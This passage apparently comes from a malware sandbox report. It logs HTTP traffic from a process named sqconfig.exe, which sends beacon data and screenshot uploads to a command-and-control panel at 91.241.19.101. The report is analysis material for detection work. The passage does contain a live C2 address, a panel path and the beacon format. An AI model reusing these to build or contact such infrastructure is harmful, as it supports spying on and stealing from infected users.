                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:51.220602989 CEST18744OUTData Raw: 8e f4 94 53 01 73 4a 0d 36 96 84 c4 3c 35 3d 5b 9a 84 53 85 55 c9 68 9b 20 d0 54 1a 88 1a 50 4d 55 c5 61 c6 15 34 c3 6f e9 52 06 a7 06 a2 c9 8a f2 45 63 0b 0a 69 42 3b 55 de 0d 2e c5 34 b9 10 fd a3 ea 67 91 4a 2a e9 85 4d 30 db 77 14 bd 9b 2b da
                                                                  Data Ascii: SsJ6<5=[SUh TPMUa4oREciB;U.4gJ*M0w+")jC;Rh|b(/4`1K)KE.(N)%q1F)qF)XW1Or2(I1E[hRR1B1Z>bRbF\!!1ZiZ\R!&*R)1SbBVK+)
                                                                  Sep 30, 2021 23:53:51.221046925 CEST18749OUTData Raw: 59 c1 05 8e 14 12 7b 9c 9c 0a c5 46 aa 76 4f bf e6 d9 ab 95 26 9b 7f d6 df f0 4a 32 f9 0b 73 32 41 2f 9d 0a c8 cb 1c bb 4a ef 50 78 6c 1e 46 47 38 a6 e1 69 8f 2c 93 48 f2 cb 23 49 2b b1 67 77 39 66 27 92 49 ee 68 cd 76 47 64 99 c9 2b 36 da 1d e5
                                                                  Data Ascii: Y{FvO&J2s2A/JPxlFG8i,H#I+gw9f'IhvGd+6HbhNy>y&qh3jBTg;YKjOjp{QJ*;O%OCG#+Rg.VXRvwC(m4;RJQIJ(h()iQK@E.(4XBQK1@RB
                                                                  Sep 30, 2021 23:53:51.221075058 CEST18753OUTData Raw: 17 c7 1a a2 6b d7 6a 8a 00 55 52 00 00 76 1c 52 ff 00 c2 c6 f1 8f fd 0c 17 bf f7 d0 ff 00 0a e4 85 1a b0 77 8c ac fd 59 d5 3a b4 a6 ad 25 74 7d 29 a6 f8 5b 44 d2 26 f3 ac b4 e8 a3 94 74 76 25 d8 7d 0b 12 47 e1 56 b5 af f9 00 ea 3f f5 eb 2f fe 80
                                                                  Data Ascii: kjURvRwY:%t})[D&tv%}GV?/kX1Sdchefz1DwUh#4Q]((|$u^]+0%g8kxGZkBIoeiR &3_jZey8nTl\O\
                                                                  Sep 30, 2021 23:53:51.221102953 CEST18759OUTData Raw: a4 9b a9 73 51 66 97 34 5c 56 25 06 96 a1 dd 4e 0d 40 ac 4a 0d 2e 6a 2c d2 83 4c 9b 12 0a b7 ad 1c 78 29 39 ff 00 97 8a a4 0d 59 d5 f9 f0 5e 7f e9 e2 b8 f1 4b 45 ea 75 e1 17 be 78 f5 01 49 65 51 8c 92 00 cd 3b 14 d6 5d ca 47 ad 78 07 d6 1b 5a fc
                                                                  Data Ascii: sQf4\V%N@J.j,Lx)9Y^KEuxIeQ;]GxZny[#6$E8f`\N;|VUR;YO,GC`jV.:K@mq3Ylqf{<U5[Ea5F$P>oKW%~?z.u7M!iJrl
                                                                  Sep 30, 2021 23:53:51.335923910 CEST18764OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:53:51.336292028 CEST18770OUTData Raw: ef fb 90 fd 57 e6 79 ab 7c 06 d3 36 9d ba 80 2d 8e 01 85 c0 ff 00 d1 95 e5 1e 34 f0 4d ff 00 84 b5 16 8e 54 26 03 ca ba e4 8c 7a 83 dc 7f 93 5f 57 59 5d 25 f5 85 bd dc 60 84 9e 25 95 41 ea 03 00 7f ad 67 78 97 c3 f6 be 23 d2 25 b3 b8 45 2f 82 62
                                                                  Data Ascii: Wy|6-4MT&z_WY]%`%Agx#%E/br>c2=6nx*Kb$S[Gg\CjA ~H!QN*K*5eJ[h:g4U>6Z]3NVts0h,;qqY}h}i
                                                                  Sep 30, 2021 23:53:51.510587931 CEST18808INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:51 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  176192.168.2.35001191.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:51.357275009 CEST18807OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:51.549941063 CEST18808INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:51 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  177192.168.2.35001291.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:51.783083916 CEST18809OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:51.968895912 CEST18848INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:51 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  178192.168.2.35001391.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:51.831855059 CEST18810OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:51.831998110 CEST18810OUTData Raw: 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:51.832181931 CEST18820OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:51.832274914 CEST18823OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:51.946206093 CEST18831OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:51.946645975 CEST18839OUTData Raw: 60 29 db 6a 43 13 0e d4 98 a5 ca c7 cc 33 14 e0 29 71 4b 8a 76 15 c6 e2 94 0a 5c 53 b1 4e c2 b8 dc 51 8a 76 29 71 40 5c 6e 29 71 4e c5 28 15 56 26 e3 71 46 29 f8 a3 14 ec 2b 91 e2 93 6d 4d b6 93 6d 1c a3 e6 21 2b 48 56 a7 2b 4d 2b 53 ca 3e 62 be
                                                                  Data Ascii: `)jC3)qKv\SNQv)q@\n)qN(V&qF)+mMm!+HV+M+S>biJVR2iJWR2J\)L)PhS+M+VS+7E29ZaZHi9_ZaZR"I2S"Ch%%%;bS66:u[xZk[kIFq1L3)<O`V{r
                                                                  Sep 30, 2021 23:53:51.946775913 CEST18848OUTData Raw: 17 c7 1a a2 6b d7 6a 8a 00 55 52 00 00 76 1c 52 ff 00 c2 c6 f1 8f fd 0c 17 bf f7 d0 ff 00 0a e4 85 1a b0 77 8c ac fd 59 d5 3a b4 a6 ad 25 74 7d 29 a6 f8 5b 44 d2 26 f3 ac b4 e8 a3 94 74 76 25 d8 7d 0b 12 47 e1 56 b5 af f9 00 ea 3f f5 eb 2f fe 80
                                                                  Data Ascii: kjURvRwY:%t})[D&tv%}GV?/kX1Sdchefz1DwUh#4Q]((|$u^]+0%g8kxGZkBIoeiR &3_jZey8nTl\O\
                                                                  Sep 30, 2021 23:53:52.061995029 CEST18851OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:53:52.062108994 CEST18859OUTData Raw: 18 9e 1f 3a 0f ed 1d 3d f5 28 22 32 cb a7 23 b9 9d 00 19 61 9d 9e 59 65 19 25 43 92 30 46 32 08 ac 40 72 b9 15 d8 58 7f 63 cb e2 bb bd 7e cb 5d b4 13 4a 67 ba b6 b0 b9 dd 04 a6 57 07 f7 6f 23 81 0a 80 58 fc db ce 40 e0 64 e0 73 b0 da 68 ea 63 8e
                                                                  Data Ascii: :=("2#aYe%C0F2@rXc~]JgWo#X@dshcMyWWah8>q8g%k)n\S`JS{E%(bQIA (`:6`QKHAKJZ`- 1EAE-RRQEZNQ@Mh$Z(SE-%
                                                                  Sep 30, 2021 23:53:52.062280893 CEST18870OUTData Raw: 2a 9b 69 04 09 3c 20 05 67 42 37 64 ee 63 b4 e4 b1 f5 aa da 46 a5 a4 69 5e 19 d2 f5 66 3a 94 29 67 ae cf 3d a5 b4 7b 25 69 48 86 12 12 49 72 9b 54 f0 09 08 78 27 8a 9f 6c ed 7f eb 57 61 fb 25 7f eb a2 b9 ca ae 8b aa b6 96 75 55 d2 ef 8e 9c 01 26
                                                                  Data Ascii: *i< gB7dcFi^f:)g={%iHIrTx'lWa%uU&[^I'gnSf%aH[V3_n].D%e%p7)Qb:~v'hbe96F<|goN)y+_ok_Gcy4C.Qbb/<#5.
                                                                  Sep 30, 2021 23:53:52.062315941 CEST18875OUTData Raw: a6 05 37 42 27 95 99 42 4f 13 26 8b 38 a4 35 45 af f1 d0 54 2d 7e e7 a5 76 f2 33 91 50 93 35 3e 5f 5a 43 24 63 a9 ac 66 ba 90 f7 a8 cc ae 7b d3 e4 34 58 77 d4 db 37 51 2f 61 51 b6 a2 ab d3 15 8d 92 7b d1 c9 a3 91 1a 2a 09 1a 6d aa 31 e9 50 3e a1
                                                                  Data Ascii: 7B'BO&85ET-~v3P5>_ZC$cf{4Xw7Q/aQ{*m1P>!TdTCURiUYZ(P0JQ@RR$Z1J\N@4v(-1Q@\j~f_j[pZh_U_KefqO;pkvxgQLAKIKLi(Ei;L.P)h!(
                                                                  Sep 30, 2021 23:53:52.218058109 CEST18898INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:52 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  179192.168.2.35001491.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:52.210004091 CEST18897OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:52.428231955 CEST18898INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:52 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0
                                                                  Sep 30, 2021 23:53:52.678771973 CEST18898OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----d2fcd16484b4dc546a2495c261c433db
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86499
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:52.678827047 CEST18898OUTData Raw: 2d 2d 2d 2d 2d 2d 64 32 66 63 64 31 36 34 38 34 62 34 64 63 35 34 36 61 32 34 39 35 63 32 36 31 63 34 33 33 64 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------d2fcd16484b4dc546a2495c261c433dbContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:52.679039001 CEST18908OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:52.679158926 CEST18911OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:52.805409908 CEST18922OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:52.805483103 CEST18932OUTData Raw: 59 c1 05 8e 14 12 7b 9c 9c 0a c5 46 aa 76 4f bf e6 d9 ab 95 26 9b 7f d6 df f0 4a 32 f9 0b 73 32 41 2f 9d 0a c8 cb 1c bb 4a ef 50 78 6c 1e 46 47 38 a6 e1 69 8f 2c 93 48 f2 cb 23 49 2b b1 67 77 39 66 27 92 49 ee 68 cd 76 47 64 99 c9 2b 36 da 1d e5
                                                                  Data Ascii: Y{FvO&J2s2A/JPxlFG8i,H#I+gw9f'IhvGd+6HbhNy>y&qh3jBTg;YKjOjp{QJ*;O%OCG#+Rg.VXRvwC(m4;RJQIJ(h()iQK@E.(4XBQK1@RB
                                                                  Sep 30, 2021 23:53:52.805509090 CEST18938OUTData Raw: c7 87 18 ff 00 d3 33 5e 2f 7e df be 73 fe d1 af 3b 28 5e f4 cf 7b 39 77 f6 7e 87 a1 59 71 f0 ee 0f a8 fe 75 cc c9 5d 25 a1 c7 c3 bb 6f 73 fd 6b 97 95 c8 27 da b4 c2 2f 7a 7e ac e4 cc dd 94 3d 11 13 92 0f 06 90 4b 20 e8 e4 7e 34 84 e6 9b 5e 8d 91
                                                                  Data Ascii: 3^/~s;(^{9w~Yqu]%osk'/z~=K ~4^;NrgOXoE.Hu,i'AMkI>bq+[2wqVE~5lCT<GsMu5XO-&<Jii-iD'kg/TF5W+9+zO7:&r#
                                                                  Sep 30, 2021 23:53:52.935071945 CEST18941OUTData Raw: 00 15 1c 78 1a d3 de 4a f2 e7 3f 37 e3 5c 78 2f e1 4b d5 9f 47 5f 59 c7 d1 1e cb 37 1e 0f d2 3f dc 1f ca b1 cf 5a d8 b8 ff 00 91 4b 47 ff 00 ae 63 f9 56 3f 7a e4 c3 7c 2f d5 9a 63 3e 35 e8 80 7b d2 e0 51 4b 5d 27 1a 10 0a 7e 29 b4 a2 91 48 70 14
                                                                  Data Ascii: xJ?7\x/KG_Y7?ZKGcV?z|/c>5{QK]'~)Hpp)JK-N)sRhQMIxT2tT!Slhi1J%"Pi:phk~)?"=k~((|dUm#Cm<Bfo1}Xc9iZh7
                                                                  Sep 30, 2021 23:53:52.935152054 CEST18946OUTData Raw: 21 cc 8b f5 ae 1c 27 f0 5f ab 3e 8e af c6 bd 11 ec fa a7 1a 16 93 ff 00 5c 47 f2 ac 5e f5 b7 ab 71 a3 69 43 fe 98 8f e4 2b 0e b9 70 bf c3 fb ca c7 ff 00 1b ee 17 14 b8 34 99 a5 cd 74 9c 61 4f 14 ca 50 6a 46 89 29 69 a0 d2 f7 a4 5a 14 53 85 37 34
                                                                  Data Ascii: !'_>\G^qiC+p4taOPjF)iZS74H;((R!iT!HRLu0Z&* qR)C5C\T8u)yz5_7uCj-JP;Y0M&MsQQ(7xxt+2JQQo
                                                                  Sep 30, 2021 23:53:52.935321093 CEST18949OUTData Raw: dc 1f 4a ee bc 69 f1 06 d3 c6 3e 05 b4 b6 78 cd be a9 0d ea 3c b0 80 4a b2 84 70 59 4f a6 48 e0 f2 33 df ad 78 79 86 02 a5 6a ea 4b 67 a7 a1 df 86 c4 46 9d 36 9e e8 f6 d8 bb 55 b8 eb e3 f1 4b 59 2c 83 fe 9e 7e 1f f0 4b 79 8f f7 7f 1f f8 01 4b 8a
                                                                  Data Ascii: Ji>x<JpYOH3xyjKgF6UKY,~KyKJQ_FyaKICGBA5W4OGl?enq9%(xjIoyr^n=1"A"|bO,6>qbXTrODKe[JmKs^k=
                                                                  Sep 30, 2021 23:53:52.935343981 CEST18957OUTData Raw: 4d 14 e1 40 98 ea 29 33 4a 29 92 3a 8a 43 45 02 62 d1 45 28 a0 46 c7 87 bf e3 fd bf eb 99 aa 6d f7 db eb 56 f4 0f f8 fe 6f fa e6 6a a3 7d f6 fa 9a c2 3f c5 63 a9 fc 34 25 2d 1d a8 15 b9 ce 2d 3a 9b 4e a4 48 53 a9 05 2d 4b 10 a2 8a 4a 5a 09 0a 28
                                                                  Data Ascii: M@)3J):CEbE(FmVoj}?c4%--:NHS-KJZ(F(bG47(BV>F8I{NgnTK%?,=yKoWDY[[_;>kq{st^*t$gBfKSi4\p4
                                                                  Sep 30, 2021 23:53:53.144810915 CEST18986INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:53 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  18192.168.2.34977791.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:52:54.769205093 CEST7632OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:52:54.930557966 CEST7682INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:52:54 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  180192.168.2.35001591.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:52.906744003 CEST18938OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:53.098288059 CEST18986INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:53 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  181192.168.2.35001691.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:53.357237101 CEST18987OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:53.564199924 CEST19001INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:53 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  182192.168.2.35001791.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:53.481426001 CEST18988OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:53.481563091 CEST18988OUTData Raw: 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
